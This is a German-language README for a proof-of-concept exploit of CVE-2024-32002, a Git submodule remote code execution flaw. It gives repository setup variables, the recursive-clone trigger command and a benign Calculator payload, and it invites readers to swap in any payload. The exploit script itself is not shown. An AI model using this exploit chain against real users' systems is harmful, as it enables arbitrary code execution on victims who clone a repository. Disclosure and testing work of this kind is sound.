
CVE-2024-32002 RCE PoC
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-32002, eine Remote Code Execution (RCE)-Schwachstelle in Git-Submodulen. Der Exploit zeigt, wie eine bösartige Nutzlast über ein rekursives Klonen eines Git-Repositorys ausgelöst werden kann.
Bevor Sie den PoC ausführen, erstellen Sie die folgenden Repositorys auf Ihrem Remote-Git-Server, oder ändern Sie die Namen nach Bedarf:
hulk.gitsubmod.gitsmash.gitAktualisieren Sie die Repository-Pfade im PoC-Skript entsprechend, falls Sie die Namen ändern.
Der Exploit nutzt Git-Submodule aus, um eine Nutzlast auf dem Zielsystem auszuführen, wenn das Repository rekursiv geklont wird. Dieser PoC wurde unter macOS getestet.
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"
# Final Exploit Repo
SMASH_REPO="[email protected]:safebuffer/smash.git"
Um den Exploit auszulösen, führen Sie zuerst das poc.sh-Skript aus und dann den folgenden Befehl:
git clone --recursive $SMASH_REPO
Die Standard-Nutzlast in diesem PoC öffnet die Calculator-Anwendung unter macOS. Sie können diese durch eine beliebige Nutzlast Ihrer Wahl ersetzen.
/System/Applications/Calculator.app/Contents/MacOS/Calculator
Dieser PoC dient nur zu Bildungszwecken. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Testgenehmigung haben. Missbrauch dieses PoC kann schwerwiegende Folgen haben.